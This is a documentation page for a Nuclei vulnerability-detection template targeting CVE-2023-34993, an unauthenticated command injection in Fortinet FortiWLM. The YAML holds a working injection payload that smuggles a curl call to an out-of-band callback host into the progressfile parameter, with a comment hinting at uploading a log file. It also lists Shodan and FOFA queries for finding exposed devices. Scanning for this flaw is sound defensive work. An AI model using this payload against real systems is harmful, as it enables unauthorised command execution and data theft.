Skip to content
Nuclei Templates

Fortinet FortiWLM Unauthenticated Command Injection Vulnerability

ID: CVE-2023-34993

Severity: critical

Author: dwisiswant0

Tags: cve,cve2023,fortinet,fortiwlm,rce,unauth

Description

Section titled “Description”

A improper neutralization of special elements used in an os command (‘oscommand injection’) in Fortinet FortiWLM version 8.6.0 through 8.6.5 and8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commandsSuccessful exploitation of this vulnerability could allow an attacker tobypass authentication and gain unauthorized access to the affected system.

YAML Source

Section titled “YAML Source”
id: CVE-2023-34993


info:
  name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
  author: dwisiswant0
  severity: critical
  description: |
    A improper neutralization of special elements used in an os command ('os
    command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
    8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
    Successful exploitation of this vulnerability could allow an attacker to
    bypass authentication and gain unauthorized access to the affected system.
  remediation: |
    For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
    For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
  reference:
    - https://fortiguard.com/psirt/FG-IR-23-140
    - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34993
    cwe-id: CWE-78
    epss-score: 0.96644
    epss-percentile: 0.99631
    cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fortinet
    product: fortiwlm
    shodan-query:
      - http.title:"FortiWLM"
      - http.html:"fortiwlm"
      - http.title:"fortiwlm"
    fofa-query:
      - body="fortiwlm"
      - title="fortiwlm"
    google-query: intitle:"fortiwlm"
  tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
variables:
  progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"


http:
  - method: GET
    path:
      - "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"


      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4b0a00483046022100c9de9e412ecabb3bf8e5a17713759735800e19f10c379b8caa492042f1f24896022100d71870208c764fcb804f93c0e3f26229120583f851d7ba738590ea4de795d203:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-34993.yaml"

View on Github